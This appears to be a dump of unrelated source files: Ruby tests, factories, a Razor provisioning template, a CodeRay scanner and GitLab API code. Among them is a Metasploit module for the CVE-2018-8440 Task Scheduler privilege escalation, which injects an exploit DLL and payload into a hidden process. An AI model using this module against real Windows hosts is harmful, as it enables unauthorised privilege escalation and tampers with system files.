end
it 'should not save the changes' do
update_g5_credentials
expect(model.g5_access_token_changed?).to be_truthy
end
end
describe '#revoke_g5_credentials!' do
subject(:revoke_g5_credentials!) { model.revoke_g5_credentials! }
let(:auth_updater) { double(:auth_user_updater, update: nil) }
before do
allow(Devise::G5::AuthUserUpdater).to receive(:new)
.and_return(auth_updater)
end
let(:model) { create(:user, g5_access_token: g5_token) }
before { model.password = model.password_confirmation = nil }
context 'when there is a g5 token' do
let(:g5_token) { 'my_g5_token' }
it 'should reset the g5 token' do
revoke_g5_credentials!
expect(model.g5_access_token).to be_nil
end
it 'should save the changes' do
revoke_g5_credentials!
expect { model.reload }.to_not change { model.g5_access_token }
end
end
context 'when there is no g5 token' do
let(:g5_token) {}
it 'should not set the g5 token' do
revoke_g5_credentials!
expect(model.g5_access_token).to be_nil
end
end
end
describe '#new_with_session' do
subject(:new_with_session) { model_class.new_with_session(params, session) }
let(:auth_data) do
OmniAuth::AuthHash.new(provider: 'g5',
uid: '123999',
info: { name: 'Foo Bar',
email: '[email protected]' },
credentials: { token: 'abc123' })
end
before do
allow_any_instance_of(model_class).to receive(:update_roles_from_auth)
end
context 'with params' do
let(:params) do
{ 'email' => email_param }
end
let(:email_param) { '[email protected]' }
context 'with session data' do
let(:session) { { 'omniauth.auth' => auth_data } }
it { is_expected.to be_new_record }
it 'should set the email from the params' do
expect(new_with_session.email).to eq(email_param)
end
it 'should set the provider from the session' do
expect(new_with_session.provider).to eq(auth_data.provider)
end
it 'should set the uid from the session' do
expect(new_with_session.uid).to eq(auth_data.uid)
end
it 'executes the callback to update role data' do
expect(new_with_session).to have_received(:update_roles_from_auth)
.with(auth_data)
end
end
context 'without session data' do
let(:session) { {} }
it { is_expected.to be_new_record }
it 'should set the email from the params' do
expect(new_with_session.email).to eq(email_param)
end
it 'should not set the provider' do
expect(new_with_session.provider).to be_nil
end
it 'should not set the uid' do
expect(new_with_session.uid).to be_nil
end
it 'should not execute the callback to update role data' do
expect_any_instance_of(model_class)
.not_to receive(:update_roles_from_auth)
new_with_session
end
end
end
context 'without params' do
let(:params) { {} }
context 'with session data' do
let(:session) do
{ 'omniauth.auth' => auth_data }
end
it { is_expected.to be_new_record }
it 'should set the email from the session' do
expect(new_with_session.email).to eq(auth_data.info[:email])
end
it 'should set the provider from the session' do
expect(new_with_session.provider).to eq(auth_data.provider)
end
it 'should set the uid from the session' do
expect(new_with_session.uid).to eq(auth_data.uid)
end
it 'executes the callback to update role data' do
expect(new_with_session).to have_received(:update_roles_from_auth)
.with(auth_data)
end
end
context 'without session data' do
let(:session) { {} }
it { is_expected.to be_new_record }
it 'should not set the email' do
expect(new_with_session.email).to be_blank
end
it 'should not set the provider' do
expect(new_with_session.provider).to be_nil
end
it 'should not set the uid' do
expect(new_with_session.uid).to be_nil
end
it 'does not execute the callback to update role data' do
expect_any_instance_of(model_class)
.not_to receive(:update_roles_from_auth)
new_with_session
end
end
end
end
describe '#attributes_from_auth' do
subject(:attributes_from_auth) { model.attributes_from_auth(auth_data) }
let(:auth_data) do
OmniAuth::AuthHash.new(provider: 'g5',
uid: '123999',
info: { first_name: 'Foo',
last_name: 'Bar',
email: '[email protected]',
phone: '123-555-1212 x42' },
credentials: { token: 'abc123' },
extra: { title: 'Minister of Funny Walks',
organization_name: 'Sales' })
end
it 'has the correct uid' do
expect(attributes_from_auth[:uid]).to eq(auth_data.uid)
end
it 'has the correct provider' do
expect(attributes_from_auth[:provider]).to eq(auth_data.provider)
end
it 'has the correct email' do
expect(attributes_from_auth[:email]).to eq(auth_data.info.email)
end
end
describe '#update_roles_from_auth' do
subject(:update_roles) { model.update_roles_from_auth(auth_data) }
let(:auth_data) do
OmniAuth::AuthHash.new(provider: 'g5',
uid: '123456',
extra: { roles: [
{ name: 'Admin',
type: 'GLOBAL',
urn: nil }
] })
end
it 'does not change anything on the model' do
expect { update_roles }.to_not change { model }
end
end
end
| 29.756944 | 80 | 0.585811 |
1df4352d66d3f890ceef7d701d69dbe3054a9a48 | 5,218 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry' #TODO: Do we need this?
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows ALPC Task Scheduler Local Privilege Elevation',
'Description' => %q(
On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented
by the task scheduler service can be used to write arbitrary DACLs to `.job` files located
in `c:\windows\tasks` because the scheduler does not use impersonation when checking this
location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be
created to a file the user has read access to. After creating a hardlink, the vulnerability
can be triggered to set the DACL on the linked file.
WARNING:
        The PrintConfig.dll (%windir%\system32\driverstore\filerepository\prnms003*) on the target host
will be overwritten when the exploit runs.
This module has been tested against Windows 10 Pro x64.
),
'License' => MSF_LICENSE,
'Author' =>
[
'SandboxEscaper', # Original discovery and PoC
'bwatters-r7', # msf module
'asoto-r7', # msf module
'Jacob Robles' # msf module
],
'Platform' => 'win',
'SessionTypes' => ['meterpreter'],
'Targets' =>
[
['Windows 10 x64', { 'Arch' => ARCH_X64 }]
],
'References' =>
[
['CVE', '2018-8440'],
['URL', 'https://github.com/SandboxEscaper/randomrepo/'],
],
'DisclosureDate' => 'Aug 27 2018',
'DefaultTarget' => 0,
))
register_options([OptString.new('PROCESS',
[false, 'Name of process to spawn and inject dll into.', nil])
])
end
def setup_process(process_name)
begin
print_status("Launching #{process_name} to host the exploit...")
launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)
process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
# Sandboxes could not allow to create a new process
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_error('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end
process
end
def inject_magic(process, payload_dll)
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll')
library_path = ::File.expand_path(library_path)
dll_data = ''
::File.open(library_path, 'rb') { |f| dll_data = f.read }
print_status("Writing payload dll into process #{process.pid} memory")
payload_addr = process.memory.allocate(payload_dll.length, PROT_READ | PROT_WRITE)
written = process.memory.write(payload_addr, payload_dll)
if written != payload_dll.length
fail_with(Failure::UnexpectedReply, 'Failed to write payload to process memory')
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
exploit_mem, offset = inject_dll_data_into_process(process, dll_data)
process.thread.create(exploit_mem + offset, payload_addr)
end
def validate_active_host
sysinfo['Computer']
true
rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
false
end
def validate_target
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if sysinfo['Architecture'] == ARCH_X86
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
end
if sysinfo['OS'] =~ /XP/
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
end
end
def exploit
unless session.type == 'meterpreter'
fail_with(Failure::None, 'Only meterpreter sessions are supported')
end
payload_dll = generate_payload_dll
process_name = datastore['PROCESS'] || 'notepad.exe'
print_status('Checking target...')
unless validate_active_host
raise Msf::Exploit::Failed, 'Could not connect to session'
end
validate_target
print_status("Target Looks Good... trying to start #{process_name}")
process = setup_process(process_name)
inject_magic(process, payload_dll)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error(e.message)
end
end
| 36.48951 | 113 | 0.665006 |
1a9210a7ae6faf9ca7a8d6b4206af6d7f9f783b2 | 1,178 | # rubocop:disable Metrics/LineLength
# == Schema Information
#
# Table name: reports
#
# id :integer not null, primary key
# explanation :text
# naughty_type :string not null, indexed => [naughty_id]
# reason :integer not null
# status :integer default(0), not null, indexed
# created_at :datetime not null
# updated_at :datetime not null
# moderator_id :integer
# naughty_id :integer not null, indexed => [user_id], indexed => [naughty_type]
# user_id :integer not null, indexed => [naughty_id]
#
# Indexes
#
# index_reports_on_naughty_id_and_user_id (naughty_id,user_id) UNIQUE
# index_reports_on_naughty_type_and_naughty_id (naughty_type,naughty_id)
# index_reports_on_status (status)
#
# Foreign Keys
#
# fk_rails_c7699d537d (user_id => users.id)
# fk_rails_cfe003e081 (moderator_id => users.id)
#
# rubocop:enable Metrics/LineLength
FactoryBot.define do
factory :report do
association :naughty, factory: :post, strategy: :build
association :user, factory: :user, strategy: :build
reason { :nsfw }
end
end
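# In a spec, the factory above can be exercised roughly like this:
#
#   report = build(:report)   # unsaved report with an unsaved post and user
#   create(:report)           # persists the report together with its associations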
| 31.837838 | 91 | 0.655348 |
e92d348550bc8e717a735d43d6922bfcedfc1299 | 1,640 | require File.expand_path("../../../../spec_helper", __FILE__)
describe Pod::Generator::Markdown do
before do
@file_accessor = fixture_file_accessor('banana-lib/BananaLib.podspec')
@spec = @file_accessor.spec
@generator = Pod::Generator::Markdown.new([@file_accessor])
@spec.stubs(:name).returns("POD_NAME")
@generator.stubs(:license_text).returns("LICENSE_TEXT")
end
it "returns a correctly formatted title string" do
@generator.title_from_string("A Title", 2).should.equal "## A Title"
end
it "returns a correctly formatted license string for each pod" do
@generator.string_for_spec(@spec).should.equal "\n## POD_NAME\n\nLICENSE_TEXT\n"
end
it "returns a correctly formatted markdown string for the target" do
@generator.stubs(:header_title).returns("HEADER_TITLE")
@generator.stubs(:header_text).returns("HEADER_TEXT")
@generator.stubs(:footnote_title).returns("") # Test that extra \n isn't added for empty strings
@generator.stubs(:footnote_text).returns("FOOTNOTE_TEXT")
@generator.licenses.should.equal "# HEADER_TITLE\nHEADER_TEXT\n\n## POD_NAME\n\nLICENSE_TEXT\nFOOTNOTE_TEXT\n"
end
it "writes a markdown file to disk" do
basepath = config.sandbox.root + "Pods-acknowledgements"
given_path = @generator.class.path_from_basepath(basepath)
expected_path = config.sandbox.root + "Pods-acknowledgements.markdown"
mockFile = mock
mockFile.expects(:write).with(equals(@generator.licenses))
mockFile.expects(:close)
File.expects(:new).with(equals(expected_path), equals("w")).returns(mockFile)
@generator.save_as(given_path)
end
end
| 41 | 114 | 0.733537 |
26c059ed3c29ab1730d3849e331a60d8514f4d97 | 9,213 | require "erb"
# Root ProjectRazor namespace
module ProjectRazor
module ModelTemplate
# Root Model object
# @abstract
class Opensuse12 < ProjectRazor::ModelTemplate::Base
include(ProjectRazor::Logging)
# Assigned image
attr_accessor :image_uuid
# Metadata
attr_accessor :hostname
# Compatible Image Prefix
attr_accessor :image_prefix
def initialize(hash)
super(hash)
# Static config
@hidden = false
@template = :linux_deploy
@name = "opensuse_12"
@description = "OpenSuSE Suse 12 Model"
# Metadata vars
@hostname_prefix = nil
# State / must have a starting state
@current_state = :init
# Image UUID
@image_uuid = true
# Image prefix we can attach
@image_prefix = "os"
# Enable agent brokers for this model
@broker_plugin = :agent
@osversion = 12
@final_state = :os_complete
from_hash(hash) unless hash == nil
@req_metadata_hash = {
"@hostname_prefix" => {
:default => "node",
:example => "node",
:validation => '^[\w]+$',
:required => true,
:description => "node hostname prefix (will append node number)"
},
"@root_password" => {
:default => "test1234",
:example => "P@ssword!",
:validation => '^[\S]{8,}',
:required => true,
:description => "root password (> 8 characters)"
},
}
end
def callback
{ "yast" => :yast_call,
"postinstall" => :postinstall_call, }
end
def broker_agent_handoff
logger.debug "Broker agent called for: #{@broker.name}"
unless @node_ip
logger.error "Node IP address isn't known"
@current_state = :broker_fail
broker_fsm_log
end
options = {
:username => "root",
:password => @root_password,
:metadata => node_metadata,
:uuid => @node.uuid,
:ipaddress => @node_ip,
}
@current_state = @broker.agent_hand_off(options)
broker_fsm_log
end
def yast_call
@arg = @args_array.shift
case @arg
when "start"
@result = "Acknowledged yast read"
fsm_action(:yast_start, :yast)
return "ok"
when "end"
@result = "Acknowledged yast end"
fsm_action(:yast_end, :yast)
return "ok"
when "file"
@result = "Replied with yast file"
fsm_action(:yast_file, :yast)
return generate_yast(@policy_uuid)
else
return "error"
end
end
def postinstall_call
@arg = @args_array.shift
case @arg
when "inject"
fsm_action(:postinstall_inject, :postinstall)
return os_boot_script(@policy_uuid)
when "boot"
fsm_action(:os_boot, :postinstall)
return os_complete_script(@node)
when "source_fix"
fsm_action(:source_fix, :postinstall)
return
when "send_ips"
#fsm_action(:source_fix, :postinstall)
# Grab IP string
@ip_string = @args_array.shift
logger.debug "Node IP String: #{@ip_string}"
@node_ip = @ip_string if @ip_string =~ /\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b/
return
else
fsm_action(@arg.to_sym, :postinstall)
return
end
end
# Defines our FSM for this model
# For state => {action => state, ..}
def fsm_tree
{
:init => {
:mk_call => :init,
:boot_call => :init,
:yast_start => :preinstall,
:yast_file => :init,
:yast_end => :postinstall,
:timeout => :timeout_error,
:error => :error_catch,
:else => :init
},
:preinstall => {
:mk_call => :preinstall,
:boot_call => :preinstall,
:yast_start => :preinstall,
:yast_file => :init,
:yast_end => :postinstall,
:yast_timeout => :timeout_error,
:error => :error_catch,
:else => :preinstall
},
:postinstall => {
:mk_call => :postinstall,
:boot_call => :postinstall,
:yast_end => :postinstall,
:source_fix => :postinstall,
:apt_get_update => :postinstall,
:apt_get_upgrade => :postinstall,
:apt_get_ruby => :postinstall,
:postinstall_inject => :postinstall,
:os_boot => :os_complete,
:post_error => :error_catch,
:post_timeout => :timeout_error,
:error => :error_catch,
:else => :postinstall
},
:os_complete => {
:mk_call => :os_complete,
:boot_call => :os_complete,
:else => :os_complete,
:reset => :init
},
:timeout_error => {
:mk_call => :timeout_error,
:boot_call => :timeout_error,
:else => :timeout_error,
:reset => :init
},
:error_catch => {
:mk_call => :error_catch,
:boot_call => :error_catch,
:else => :error_catch,
:reset => :init
},
}
end
def mk_call(node, policy_uuid)
super(node, policy_uuid)
case @current_state
# We need to reboot
when :init, :preinstall, :postinstall, :os_validate, :os_complete, :broker_check, :broker_fail, :broker_success
ret = [:reboot, {}]
when :timeout_error, :error_catch
ret = [:acknowledge, {}]
else
ret = [:acknowledge, {}]
end
fsm_action(:mk_call, :mk_call)
ret
end
def boot_call(node, policy_uuid)
super(node, policy_uuid)
case @current_state
when :init, :preinstall
@result = "Starting Suse model install"
ret = start_install(node, policy_uuid)
when :postinstall, :os_complete, :broker_check, :broker_fail, :broker_success, :complete_no_broker
ret = local_boot(node)
when :timeout_error, :error_catch
engine = ProjectRazor::Engine.instance
ret = engine.default_mk_boot(node.uuid)
else
engine = ProjectRazor::Engine.instance
ret = engine.default_mk_boot(node.uuid)
end
fsm_action(:boot_call, :boot_call)
ret
end
# ERB.result(binding) is failing in Ruby 1.9.2 and 1.9.3 so template is processed in the def block.
def template_filepath(filename)
raise ProjectRazor::Error::Slice::InternalError, "must provide suse version." unless @osversion
filepath = File.join(File.dirname(__FILE__), "suse/#{@osversion}/#{filename}.erb")
end
def os_boot_script(policy_uuid)
@result = "Replied with os boot script"
filepath = template_filepath('os_boot')
ERB.new(File.read(filepath)).result(binding)
end
def os_complete_script(node)
@result = "Replied with os complete script"
filepath = template_filepath('os_complete')
ERB.new(File.read(filepath)).result(binding)
end
def start_install(node, policy_uuid)
filepath = template_filepath('boot_install')
ERB.new(File.read(filepath)).result(binding)
end
def local_boot(node)
filepath = template_filepath('boot_local')
ERB.new(File.read(filepath)).result(binding)
end
def kernel_args(policy_uuid)
filepath = template_filepath('kernel_args')
ERB.new(File.read(filepath)).result(binding)
end
def hostname
"#{@hostname_prefix}#{@counter.to_s}"
end
def kernel_path
"boot/x86_64/loader/linux"
end
def initrd_path
"boot/x86_64/loader/initrd"
end
def config
get_data.config
end
def image_svc_uri
"http://#{config.image_svc_host}:#{config.image_svc_port}/razor/image/os"
end
def api_svc_uri
"http://#{config.image_svc_host}:#{config.api_port}/razor/api"
end
def generate_yast(policy_uuid)
# TODO: Review hostname
hostname = "#{@hostname_prefix}#{@counter.to_s}"
filepath = template_filepath('autoyast')
ERB.new(File.read(filepath)).result(binding)
end
end
end
end
| 32.326316 | 121 | 0.511668 |
7a21354cfc45af7e44b2c9674d2091a8beb6d74c | 1,610 | module CodeRay
module Scanners
# = Debug Scanner
#
# Parses the output of the Encoders::Debug encoder.
class Raydebug < Scanner
register_for :raydebug
file_extension 'raydebug'
title 'CodeRay Token Dump'
protected
def scan_tokens encoder, options
opened_tokens = []
until eos?
if match = scan(/\s+/)
encoder.text_token match, :space
elsif match = scan(/ (\w+) \( ( [^\)\\]* ( \\. [^\)\\]* )* ) /x)
kind = self[1]
encoder.text_token kind, :class
encoder.text_token '(', :operator
match = self[2]
encoder.text_token match, kind.to_sym
encoder.text_token match, :operator if match = scan(/\)/)
elsif match = scan(/ (\w+) ([<\[]) /x)
kind = self[1]
case self[2]
when '<'
encoder.text_token kind, :class
when '['
encoder.text_token kind, :class
else
raise 'CodeRay bug: This case should not be reached.'
end
kind = kind.to_sym
opened_tokens << kind
encoder.begin_group kind
encoder.text_token self[2], :operator
elsif !opened_tokens.empty? && match = scan(/ [>\]] /x)
encoder.text_token match, :operator
encoder.end_group opened_tokens.pop
else
encoder.text_token getch, :space
end
end
encoder.end_group opened_tokens.pop until opened_tokens.empty?
encoder
end
end
end
end
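# Rough round-trip sketch (assumes the full CodeRay gem is loaded):
#
#   dump   = CodeRay.scan('1 + 1', :ruby).encode(:debug)  # token dump text
#   tokens = CodeRay.scan(dump, :raydebug)                # parsed by this scanner
#   tokens.encode(:terminal)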
| 24.029851 | 72 | 0.527329 |
fff99a1d31b5a9c1f0b7065825a6cc35adef8993 | 5,833 | $: << File.expand_path(File.dirname(__FILE__))
module QA
##
# GitLab QA runtime classes, mostly singletons.
#
module Runtime
autoload :Release, 'qa/runtime/release'
autoload :User, 'qa/runtime/user'
autoload :Namespace, 'qa/runtime/namespace'
autoload :Scenario, 'qa/runtime/scenario'
autoload :Browser, 'qa/runtime/browser'
autoload :Env, 'qa/runtime/env'
autoload :RSAKey, 'qa/runtime/rsa_key'
autoload :Address, 'qa/runtime/address'
autoload :API, 'qa/runtime/api'
end
##
# GitLab QA fabrication mechanisms
#
module Factory
autoload :Base, 'qa/factory/base'
autoload :Dependency, 'qa/factory/dependency'
autoload :Product, 'qa/factory/product'
module Resource
autoload :Sandbox, 'qa/factory/resource/sandbox'
autoload :Group, 'qa/factory/resource/group'
autoload :Issue, 'qa/factory/resource/issue'
autoload :Project, 'qa/factory/resource/project'
autoload :MergeRequest, 'qa/factory/resource/merge_request'
autoload :DeployKey, 'qa/factory/resource/deploy_key'
autoload :Branch, 'qa/factory/resource/branch'
autoload :SecretVariable, 'qa/factory/resource/secret_variable'
autoload :Runner, 'qa/factory/resource/runner'
autoload :PersonalAccessToken, 'qa/factory/resource/personal_access_token'
end
module Repository
autoload :Push, 'qa/factory/repository/push'
end
module Settings
autoload :HashedStorage, 'qa/factory/settings/hashed_storage'
end
end
##
# GitLab QA Scenarios
#
module Scenario
##
# Support files
#
autoload :Bootable, 'qa/scenario/bootable'
autoload :Actable, 'qa/scenario/actable'
autoload :Taggable, 'qa/scenario/taggable'
autoload :Template, 'qa/scenario/template'
##
# Test scenario entrypoints.
#
module Test
autoload :Instance, 'qa/scenario/test/instance'
module Integration
autoload :LDAP, 'qa/scenario/test/integration/ldap'
autoload :Mattermost, 'qa/scenario/test/integration/mattermost'
end
module Sanity
autoload :Selectors, 'qa/scenario/test/sanity/selectors'
end
end
end
##
# Classes describing structure of GitLab, pages, menus etc.
#
# Needed to execute click-driven-only black-box tests.
#
module Page
autoload :Base, 'qa/page/base'
autoload :View, 'qa/page/view'
autoload :Element, 'qa/page/element'
autoload :Validator, 'qa/page/validator'
module Main
autoload :Login, 'qa/page/main/login'
autoload :OAuth, 'qa/page/main/oauth'
end
module Settings
autoload :Common, 'qa/page/settings/common'
end
module Menu
autoload :Main, 'qa/page/menu/main'
autoload :Side, 'qa/page/menu/side'
autoload :Admin, 'qa/page/menu/admin'
autoload :Profile, 'qa/page/menu/profile'
end
module Dashboard
autoload :Projects, 'qa/page/dashboard/projects'
autoload :Groups, 'qa/page/dashboard/groups'
end
module Group
autoload :New, 'qa/page/group/new'
autoload :Show, 'qa/page/group/show'
end
module Project
autoload :New, 'qa/page/project/new'
autoload :Show, 'qa/page/project/show'
autoload :Activity, 'qa/page/project/activity'
module Pipeline
autoload :Index, 'qa/page/project/pipeline/index'
autoload :Show, 'qa/page/project/pipeline/show'
end
module Job
autoload :Show, 'qa/page/project/job/show'
end
module Settings
autoload :Common, 'qa/page/project/settings/common'
autoload :Advanced, 'qa/page/project/settings/advanced'
autoload :Main, 'qa/page/project/settings/main'
autoload :Repository, 'qa/page/project/settings/repository'
autoload :CICD, 'qa/page/project/settings/ci_cd'
autoload :DeployKeys, 'qa/page/project/settings/deploy_keys'
autoload :ProtectedBranches, 'qa/page/project/settings/protected_branches'
autoload :SecretVariables, 'qa/page/project/settings/secret_variables'
autoload :Runners, 'qa/page/project/settings/runners'
autoload :MergeRequest, 'qa/page/project/settings/merge_request'
end
module Issue
autoload :New, 'qa/page/project/issue/new'
autoload :Show, 'qa/page/project/issue/show'
autoload :Index, 'qa/page/project/issue/index'
end
end
module Profile
autoload :PersonalAccessTokens, 'qa/page/profile/personal_access_tokens'
end
module MergeRequest
autoload :New, 'qa/page/merge_request/new'
autoload :Show, 'qa/page/merge_request/show'
end
module Admin
module Settings
autoload :RepositoryStorage, 'qa/page/admin/settings/repository_storage'
autoload :Main, 'qa/page/admin/settings/main'
end
end
module Mattermost
autoload :Main, 'qa/page/mattermost/main'
autoload :Login, 'qa/page/mattermost/login'
end
##
# Classes describing components that are used by several pages.
#
module Component
autoload :Dropzone, 'qa/page/component/dropzone'
end
end
##
# Classes describing operations on Git repositories.
#
module Git
autoload :Repository, 'qa/git/repository'
autoload :Location, 'qa/git/location'
end
##
# Classes describing services being part of GitLab and how we can interact
# with these services, like through the shell.
#
module Service
autoload :Shellout, 'qa/service/shellout'
autoload :Omnibus, 'qa/service/omnibus'
autoload :Runner, 'qa/service/runner'
end
##
  # Classes that make it possible to execute feature tests.
#
module Specs
autoload :Config, 'qa/specs/config'
autoload :Runner, 'qa/specs/runner'
end
end
QA::Runtime::Release.extend_autoloads!
| 28.315534 | 82 | 0.674439 |
212b2cb949d07bb5e5545a66543d2c5c613710a9 | 1,322 | require 'mongo_doc'
class Address
include MongoDoc::Document
attr_accessor :street
attr_accessor :city
attr_accessor :state
attr_accessor :zip_code
attr_accessor :phone_number
end
class Contact
include MongoDoc::Document
attr_accessor :name
attr_accessor :interests
embed_many :addresses
scope :in_state, lambda {|state| where('addresses.state' => state)}
end
Contact.collection.drop
contact = Contact.new(:name => 'Hashrocket', :interests => ['ruby', 'rails', 'agile'])
contact.addresses << Address.new(:street => '320 1st Street North, #712', :city => 'Jacksonville Beach', :state => 'FL', :zip_code => '32250', :phone_number => '877 885 8846')
contact.save
# Finders
Contact.find_all.each {|c| puts c.name}
puts contact.to_param
puts Contact.find_one(contact.to_param).addresses.first.street
Contact.find(contact.to_param).each {|c| puts c.name}
hashrocket_in_fl = Contact.in_state('FL').where(:name => /rocket/)
hashrocket_address = hashrocket_in_fl.first.addresses.first
hashrocket_address.update_attributes(:street => '320 First Street North, #712')
puts Contact.where(:name => 'Hashrocket').first.addresses.first.street
# Criteria behave like new AR3 AREL queries
hr = Contact.where(:name => 'Hashrocket')
hr_in = hr.where('addresses.state' => 'IN')
puts hr.count
puts hr_in.count
| 28.12766 | 175 | 0.74357 |
334af36a2b7b24ba417d2b6411a1bdf3c50c86f1 | 1,197 | module VanillaIse
class EndpointGroup < Object
def self.all(page_size: 100, page_limit: Float::INFINITY)
Base.make_api_call(
'/config/endpointgroup',
:get,
page_size: page_size,
page_limit: page_limit,
).collect { |group| self.new(group) }
end
def self.search(filters, page_size: 100, page_limit: Float::INFINITY, fetch: true)
      raise ArgumentError, 'No filters provided' if filters.empty?
Base.disable_rails_query_string_format
params = Filter.parse(filters)
params[:filtertype] = 'or'
results = []
response = Base.make_api_call(
'/config/endpointgroup',
:get,
query_params: params,
page_size: page_size,
page_limit: page_limit,
)
if fetch
Async do |task|
response.each do |group|
task.async { results << self.find(group['id']) }
end
end
else
response.each { |group| results << new(group['id']) }
end
results
end
def self.find(id)
new Base.make_api_call(
"/config/endpointgroup/#{id}",
:get,
)&.dig('EndPointGroup')
end
end
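  # Usage sketch (identifiers are illustrative; assumes VanillaIse::Base is
  # already configured elsewhere in the gem):
  #
  #   VanillaIse::EndpointGroup.all(page_size: 50)
  #   VanillaIse::EndpointGroup.find('aa13bb30-8bfe-11e6-996c-525400b48521')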
end | 26.021739 | 86 | 0.583124 |
5d1fe22f2dff68597fa1bc08850479f2bb3ee2f9 | 12,076 | module API
class MergeRequests < Grape::API
include PaginationParams
DEPRECATION_MESSAGE = 'This endpoint is deprecated and will be removed in GitLab 9.0.'.freeze
before { authenticate! }
params do
requires :id, type: String, desc: 'The ID of a project'
end
resource :projects do
helpers do
def handle_merge_request_errors!(errors)
if errors[:project_access].any?
error!(errors[:project_access], 422)
elsif errors[:branch_conflict].any?
error!(errors[:branch_conflict], 422)
elsif errors[:validate_fork].any?
error!(errors[:validate_fork], 422)
elsif errors[:validate_branches].any?
conflict!(errors[:validate_branches])
end
render_api_error!(errors, 400)
end
params :optional_params do
optional :description, type: String, desc: 'The description of the merge request'
optional :assignee_id, type: Integer, desc: 'The ID of a user to assign the merge request'
optional :milestone_id, type: Integer, desc: 'The ID of a milestone to assign the merge request'
optional :labels, type: String, desc: 'Comma-separated list of label names'
optional :remove_source_branch, type: Boolean, desc: 'Remove source branch when merging'
end
end
desc 'List merge requests' do
success Entities::MergeRequest
end
params do
optional :state, type: String, values: %w[opened closed merged all], default: 'all',
desc: 'Return opened, closed, merged, or all merge requests'
optional :order_by, type: String, values: %w[created_at updated_at], default: 'created_at',
desc: 'Return merge requests ordered by `created_at` or `updated_at` fields.'
optional :sort, type: String, values: %w[asc desc], default: 'desc',
desc: 'Return merge requests sorted in `asc` or `desc` order.'
optional :iid, type: Array[Integer], desc: 'The IID of the merge requests'
use :pagination
end
get ":id/merge_requests" do
authorize! :read_merge_request, user_project
merge_requests = user_project.merge_requests.inc_notes_with_associations
merge_requests = filter_by_iid(merge_requests, params[:iid]) if params[:iid].present?
merge_requests =
case params[:state]
when 'opened' then merge_requests.opened
when 'closed' then merge_requests.closed
when 'merged' then merge_requests.merged
else merge_requests
end
merge_requests = merge_requests.reorder(params[:order_by] => params[:sort])
present paginate(merge_requests), with: Entities::MergeRequest, current_user: current_user, project: user_project
end
desc 'Create a merge request' do
success Entities::MergeRequest
end
params do
requires :title, type: String, desc: 'The title of the merge request'
requires :source_branch, type: String, desc: 'The source branch'
requires :target_branch, type: String, desc: 'The target branch'
optional :target_project_id, type: Integer,
desc: 'The target project of the merge request defaults to the :id of the project'
use :optional_params
end
post ":id/merge_requests" do
authorize! :create_merge_request, user_project
mr_params = declared_params(include_missing: false)
mr_params[:force_remove_source_branch] = mr_params.delete(:remove_source_branch) if mr_params[:remove_source_branch].present?
merge_request = ::MergeRequests::CreateService.new(user_project, current_user, mr_params).execute
if merge_request.valid?
present merge_request, with: Entities::MergeRequest, current_user: current_user, project: user_project
else
handle_merge_request_errors! merge_request.errors
end
end
desc 'Delete a merge request'
params do
requires :merge_request_id, type: Integer, desc: 'The ID of a merge request'
end
delete ":id/merge_requests/:merge_request_id" do
merge_request = user_project.merge_requests.find_by(id: params[:merge_request_id])
authorize!(:destroy_merge_request, merge_request)
merge_request.destroy
end
# Routing "merge_request/:merge_request_id/..." is DEPRECATED and WILL BE REMOVED in version 9.0
# Use "merge_requests/:merge_request_id/..." instead.
#
params do
requires :merge_request_id, type: Integer, desc: 'The ID of a merge request'
end
{ ":id/merge_request/:merge_request_id" => :deprecated, ":id/merge_requests/:merge_request_id" => :ok }.each do |path, status|
desc 'Get a single merge request' do
if status == :deprecated
detail DEPRECATION_MESSAGE
end
success Entities::MergeRequest
end
get path do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
authorize! :read_merge_request, merge_request
present merge_request, with: Entities::MergeRequest, current_user: current_user, project: user_project
end
desc 'Get the commits of a merge request' do
success Entities::RepoCommit
end
get "#{path}/commits" do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
authorize! :read_merge_request, merge_request
present merge_request.commits, with: Entities::RepoCommit
end
desc 'Show the merge request changes' do
success Entities::MergeRequestChanges
end
get "#{path}/changes" do
merge_request = user_project.merge_requests.find(params[:merge_request_id])
authorize! :read_merge_request, merge_request
present merge_request, with: Entities::MergeRequestChanges, current_user: current_user
end
desc 'Update a merge request' do
success Entities::MergeRequest
end
params do
optional :title, type: String, allow_blank: false, desc: 'The title of the merge request'
optional :target_branch, type: String, allow_blank: false, desc: 'The target branch'
optional :state_event, type: String, values: %w[close reopen merge],
desc: 'Status of the merge request'
use :optional_params
at_least_one_of :title, :target_branch, :description, :assignee_id,
:milestone_id, :labels, :state_event,
:remove_source_branch
end
put path do
merge_request = user_project.merge_requests.find(params.delete(:merge_request_id))
authorize! :update_merge_request, merge_request
mr_params = declared_params(include_missing: false)
mr_params[:force_remove_source_branch] = mr_params.delete(:remove_source_branch) if mr_params[:remove_source_branch].present?
merge_request = ::MergeRequests::UpdateService.new(user_project, current_user, mr_params).execute(merge_request)
if merge_request.valid?
